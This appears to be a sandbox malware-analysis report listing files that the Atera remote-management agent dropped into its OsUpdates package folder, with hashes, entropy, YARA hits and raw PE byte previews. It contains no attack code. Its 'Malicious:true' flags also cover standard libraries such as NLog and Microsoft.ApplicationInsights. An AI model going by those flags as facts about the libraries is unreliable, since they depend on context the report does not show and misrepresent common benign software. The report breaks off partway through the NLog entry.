                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):201768
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.74845613160659
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:gi5nVoxzGZzezm87EmUQ9XILSWUPH309T1qT2tl/pR3rPd3iqiTjFvd0uhH:nRVICezm8779XI0/YTx/pFLNiqiTjddN
                                                                                                                                                                                                                                                                                              MD5:D0D21E16E57A1A73056EAE228DA1E287
                                                                                                                                                                                                                                                                                              SHA1:AB5A27B1D3D977A7F657D0ACDF047067C625869F
                                                                                                                                                                                                                                                                                              SHA-256:3DB5809F23020F9988D5DB0CF494F014A87B9DC1547CF804AE9D66667505A60C
                                                                                                                                                                                                                                                                                              SHA-512:470BAC3E691525FF6007293BAC32198C0021A1411BA9D069F88F8603189B1617C2265FE6553C1F60EF788E69AFCB8AA790714C59260B7C015A5BE5B149222C48
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y............."...0.................. ........@.. .......................@.......C....`.....................................O.......4...............((... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...4...........................@..@.reloc....... ......................@..B........................H........... '............................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. K.. )UU.Z(.....{....o ...X )UU.Z(.....{....o!...X*...0..b........r...p......%..{.......%q.........-.&.+.......o"....%..{.......%q.........-.&.+.......o"....(#...*..{$...*..{%...*..{&...*..{'...*..{(...*..{)...*..(......}$.....}%.....}&......}'......}(......})...*..0...........u.......;..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1780
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.027025756159462
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3rrL7h+1/gFSagFsg+w327RgdSg+CjdgDt:7r34owoR
                                                                                                                                                                                                                                                                                              MD5:09CDFC3063DEC485A3C48111D5CEE297
                                                                                                                                                                                                                                                                                              SHA1:02CEFEC66B6B2EEE120F97493D438F3B270AB5CA
                                                                                                                                                                                                                                                                                              SHA-256:0ACF70AE533AF7D079F370AB3102B9563CA4C447C5DFC7A20C88AABE04295C01
                                                                                                                                                                                                                                                                                              SHA-512:CA39056F79EFC8CE050FCCE1AAC21B2E7B62E65A0521E3CABF90C58A7249107658C2D208706FEC456CCC74D58DCDC22E23ECBAA43684613D4826505A426E1CB7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <depend

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhWA:Wp
                                                                                                                                                                                                                                                                                              MD5:9A5E9A329E4E73E0C499371205A810DB
                                                                                                                                                                                                                                                                                              SHA1:5B6D85657D4ACD89867283FBE372E9E85C30686F
                                                                                                                                                                                                                                                                                              SHA-256:D109087C4CA318CAD74B7560C32594D37181885ADBDC9348BA1DD35D47B35B92
                                                                                                                                                                                                                                                                                              SHA-512:02BD5261B9E795ED5A07BADD65A6CF71D18751452FB44BDD424DFCC6C50BA7441E0066B125E731018FD6F1A8A002AC4E6961C7EFF21C36FBDA58C8015A100C43
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=30.3

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):102440
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1906245131779745
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:pPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OLv476sy:p2bYbYSWd85I5sSakFQhHLv4m
                                                                                                                                                                                                                                                                                              MD5:D33CE12A25C2675057480654E98ACDC5
                                                                                                                                                                                                                                                                                              SHA1:71F6AFF63988BC9FC9E8D08DBD0151F62E6A8647
                                                                                                                                                                                                                                                                                              SHA-256:F188D7C9B9C35462C556CF87A6F0880B5BAF395CE255F57076CF9AC8DC0E1A2A
                                                                                                                                                                                                                                                                                              SHA-512:DBD65A27A33AC5C3507716E89AE40413B4C2AAC3BE7415977E9447FD89FB7164B7DCB6A8B8974434AE04A7A6917DB32810F1E278EEAD2590C327E30B9A125D1A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5*f.........." ..0..^...........}... ........... ..............................u.....`.................................`}..O.......8............h..((..........(|............................................... ............... ..H............text....]... ...^.................. ..`.rsrc...8............`..............@..@.reloc...............f..............@..B.................}......H........s..|............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95272
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.9964164933276605
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:A4aRSNSrXS5EaKoDMsUVl0HAWMco2bJkjUB76654:A4auS7S5Ea6WMcpuUBL4
                                                                                                                                                                                                                                                                                              MD5:FB232BA20FACFAD72C87477E1B2B3D72
                                                                                                                                                                                                                                                                                              SHA1:1DFB6577FE0E2E2C60D3848AC588E94F7D93EAB5
                                                                                                                                                                                                                                                                                              SHA-256:828092942C6967EBBAA62BB4F0AEDAAA97522888B59D9DDF708CB863B9D2075C
                                                                                                                                                                                                                                                                                              SHA-512:EC546864F910B72A2723B60C3FA580F6CAE753E623EBE90884B70EBF93E8B511028B355E03F3282D8C5FBC82B6E128FD0893046103DECE289BD371730BA31C53
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=$..........." ..0..B..........b`... ........... ....................................`..................................`..O.......4............L..((..........h_..8............................................ ............... ..H............text...h@... ...B.................. ..`.rsrc...4............D..............@..@.reloc...............J..............@..B................A`......H.......Lh................................................................(......}......}.......}.......}........o<...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po ...o....*..{....o/...r...p.(....(....o%...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.Exceptions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.656724826773557
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:aXh+/DtY2PLNyby2sE9jBF6IYiYF85S35IVnxGUHFeFlWNZrO:aXh+tY2jNyb8E9VF6IYijSJIVxaFatO
                                                                                                                                                                                                                                                                                              MD5:B1224C51F1E9A789EE35AD5218220D2B
                                                                                                                                                                                                                                                                                              SHA1:78043C5AE8AF03B893A4A7C28AB47566A0764B1E
                                                                                                                                                                                                                                                                                              SHA-256:662723280B3F78040BB1DAA661F41AC4D5C5361827273541B569F0B5D1602125
                                                                                                                                                                                                                                                                                              SHA-512:46735609B77A36745CA0BBB353FA1DFE2294382F7F96562C84CE30751D8340C184E62B1FA0DACB2483F5A62166A691CD1A547D2310F9DAE01C3423BF1267E47D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0.............v,... ...@....... ...............................(....@.................................",..O....@..(...............((...`......H+..8............................................ ............... ..H............text...|.... ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................V,......H........ ..d...........................................................&...(....*6.r...p.(....*..(....*..(....*"..(....*. ....*.r-..p*..(....*"..(....*. ....*.r...p*..(....*"..(....*. .*..*.r...p*. ....*.rN..p*..(....*.BSJB............v2.0.50727......l.......#~......<...#Strings....D...$...#US.h.......#GUID...x.......#Blob...........G..........3......................................................................f.....F...........n.................M...........2...........Z.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):75304
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.241390537473756
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Hu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYA:OF+qo7mDEwj4NXLGcfgruFcaD76jZ
                                                                                                                                                                                                                                                                                              MD5:7EB99AA11E05B3EFA0F65A4435FFB315
                                                                                                                                                                                                                                                                                              SHA1:F07773C71BDB5769667B38E531AF58F64445F74B
                                                                                                                                                                                                                                                                                              SHA-256:0AB86983F01493D5B8297A99BAB27CBF097A4FF68384C1A039DC8B1B0C302C17
                                                                                                                                                                                                                                                                                              SHA-512:6E79E621D2893FB51933BEA95376B40CBBDA947B74A2AF7604166C821D6E8CD98BC357DD8DC16E250E7176D0DA7E19AA3D4702D4149E4215F0BF6D38A9CEBDAE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6............" ..0.............F.... ... ....... .......................`............`.....................................O.... ..................((...@..........T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................%.......H.......t<..`.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*...0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.405565171295978
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:ZQMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyXXEpYi60k:Z9MYn1seLE8JFMLcyXQ76h
                                                                                                                                                                                                                                                                                              MD5:11AA54E91257EA281D455DB6B77811B9
                                                                                                                                                                                                                                                                                              SHA1:13734726D6CB87F3A02E78A2C68FC2A35CAC9B24
                                                                                                                                                                                                                                                                                              SHA-256:63E84943E0173957D2B3869CE2E0134359FB36F5DCCEE1B8A9B1029071039D2D
                                                                                                                                                                                                                                                                                              SHA-512:2539F92E62CD67EAB842E5A982A9611B0828D547D18BE30DD8A69FA7841D629AE9E9589A41A36D472A9E68DC7CA1E063A8CE4A9D526B5266B7BB1BB5FFC4FA3C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............r.... ........... ...............................P....`.....................................O.......4...............((..........4...T............................................ ............... ..H............text...x.... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................R.......H.......XE...q...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....O.........io ...&..i.X.O..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....O......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\CommunityToolkit.WinUI.Notifications.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):145448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.203592588382526
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:zRdbKQx0YYK8gwbUEA5xZs0vVV2yzlhXhYThkyFqhtuElLVwkVJe5K+Q7P6IlIhO:t9XeDmzV2yzlhKLFU1lLVp1+2flYFnQb
                                                                                                                                                                                                                                                                                              MD5:C0DF597621C8B37AF65BB61DE0C42AFF
                                                                                                                                                                                                                                                                                              SHA1:7676065361D8822586F8A2E06C5D6BDDD23A3EEC
                                                                                                                                                                                                                                                                                              SHA-256:F616623B4CC8999F0DCADC73F98BCC4289EC90CDFA0749EACB3FE2F0401AB474
                                                                                                                                                                                                                                                                                              SHA-512:4F43937B440B23145F0A87295AECF7160118D71BCD1A0D2650FC025C7A630F5AEA773A28593F77C67A8C2C55FDA7299BA3F0C09BDAA4532FDAE9FF88C673B393
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nI..........." ..0.............v$... ...@....... ...............................U....`.................................#$..O....@..|...............((...`......,#..T............................................ ............... ..H............text...|.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................W$......H.............................."......................................V!.b.....s&........*..{....*"..}....*..0..Z........(....o'...-.r...ps(...zs......(....o)....+..o*.....o.....o0...o+....o....-....,..o......*........*.$N......J.s,...}.....(-...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*6.|.....(D...*..{....*"..}....*..{....*"..}....*V.(....-.r...p*.(....*..(E...%.(....o"...%.(....o$...%.(....o ...%.o....*..(-...*..{....*"..}....*..{ ...*"..} ...*..{!...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):96296
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.6334365923289385
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:92kKfq2RQuKDMOoytxL2L4zP+YuqL2zL7SAaDx4lbOw6OhkW76fJrk:OQmyxL2L4D+YZL2X7SAaqywjhkWerk
                                                                                                                                                                                                                                                                                              MD5:372842434C221E20896C8F46EDACA92C
                                                                                                                                                                                                                                                                                              SHA1:F58A0757262F84933744252A0B4FC1D38F15DB77
                                                                                                                                                                                                                                                                                              SHA-256:FA88BB99081003615E0BED4FA5AA167333DBE0B05A1A63B51FAA5DA7BFBE5663
                                                                                                                                                                                                                                                                                              SHA-512:A1A9A8B073F0323ED64D21A894BB93CC86157F3B8B576D1496854D26AC05334FA124E094F60E632C0F49B117B7DF0124AD2C5329A2E34F94D0A34333D0DB242A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....W...........!..... ... .......7... ...@....@.. ..............................s.....@.................................47..W....@..p............P..((...`....................................................... ............... ..H............text........ ... .................. ..`.rsrc...p....@.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):386600
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.135937789568278
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:9sETsbZnV4Nsaw8MkaybNq0qJh1rDHq4so8maLvdGCBg/8Q/ZmvEyJ:9sbZnMfwWFKFrrWa8BvEyJ
                                                                                                                                                                                                                                                                                              MD5:32C2B12FDB90808935E6EAEBC0C5FD78
                                                                                                                                                                                                                                                                                              SHA1:A18B77B7BCC1D041407D7156601F3B5348656B02
                                                                                                                                                                                                                                                                                              SHA-256:35A59D6F04E98951767DE04524EB64B7CA726E205991CD0931527F455BF0F3F8
                                                                                                                                                                                                                                                                                              SHA-512:CEE29FA1F7F976A4DECAAB7C30FC4951D540A30DD2EB4515605BB62CF0ACE9E8712CF9FAAA4DFBF7B6B60EEE5A9A2C5CF1A46785322D15CA2BC8F528225C8004
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ....................... ......_.....`.....................................O.......@...............((..............8............................................ ............... ..H............text...0.... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H.......T...$...................x.........................................{0...*..{1...*..{2...*..{3...*..(4.....}0.....}1.....}2......}3...*....0..q........u........d.,_(5....{0....{0...o6...,G(7....{1....{1...o8...,/(9....{2....{2...o:...,.(;....{3....{3...o<...*.*.*....0..b....... ...u )UU.Z(5....{0...o=...X )UU.Z(7....{1...o>...X )UU.Z(9....{2...o?...X )UU.Z(;....{3...o@...X*...0...........r...p......%..{0......%q.........-.&.+.......oA....%..{1......%q.........-.&.+.....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.83810396352101
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:7N9VWhX3WseNyb8E9VF6IYijSJIVxF5WGJ:RGZmEpYi60h
                                                                                                                                                                                                                                                                                              MD5:E88A7FE06B461A6EA66D56E239910CC3
                                                                                                                                                                                                                                                                                              SHA1:7CE72B25B887DDAD309ED0C7EE2A504AD1913B9A
                                                                                                                                                                                                                                                                                              SHA-256:625D7259448DF2BAF8844310FB95415F00B8BAA4F8300CE2C43F90CA9AD523A8
                                                                                                                                                                                                                                                                                              SHA-512:BA607172615D676E9786C4E3E92316BFACFE2589D29F4AE95B1F2FD967663812520A40ABABAF7ACC844E4D01190B084460BC5BF82B9EF183DE3684CC433FA90F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............(... ...@....... ..............................m.....@.................................T(..O....@..0...............((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l...|...#~......<...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.7...K.W...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):331816
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1686260686243735
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:VBhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNTn:VDMUWITZznu85k8Wdn8KmCjIFi3Vvb
                                                                                                                                                                                                                                                                                              MD5:84688C58A26961FB5CC64B9C07245201
                                                                                                                                                                                                                                                                                              SHA1:B823A565015EA4D6056FB776C2878DCFBD45F65C
                                                                                                                                                                                                                                                                                              SHA-256:2AFA0F82215A9821746C680EC3CF8358244EA71689A3074EC8BB1BEF7D39DD67
                                                                                                                                                                                                                                                                                              SHA-512:162AD6C55E9F3E7E7962885FE0AFD292C73DB9469354760BA0E949B9D8BA5E6657ADB7768D0432CDED9128D82293B3D1B8A933908D09FC07E95C7A6BAFE94ADC
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... .......................@...........@.....................................O.......................((... ..........T............................................ ............... ..H............text...<.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H............9..............H.............................................{....*..{....*V.(......}......}....*...0..A........u3.......4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ..<. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q6....6...-.&.+...6...o.....%..{.......%q7....7...-.&.+...7...o.....(....*..{....*..{....*..{....*r.(......}......}......}....*..0..Y........u8.......L.,G(.....{.....{....o....,/(.....{.....{....o....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\NLog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.071445078992113
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:E1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQS:E1n1p9LdRN39aQZUqD
                                                                                                                                                                                                                                                                                              MD5:B65642D5C268E5335B6D5BFFF0690DB0
                                                                                                                                                                                                                                                                                              SHA1:A58882087ED8377F88F9BAA6E448E64D214BD048
                                                                                                                                                                                                                                                                                              SHA-256:7A202887AC81D4C379102C5E66EC02AE6C58DEBDE9AB99D72B50263F83862B7B
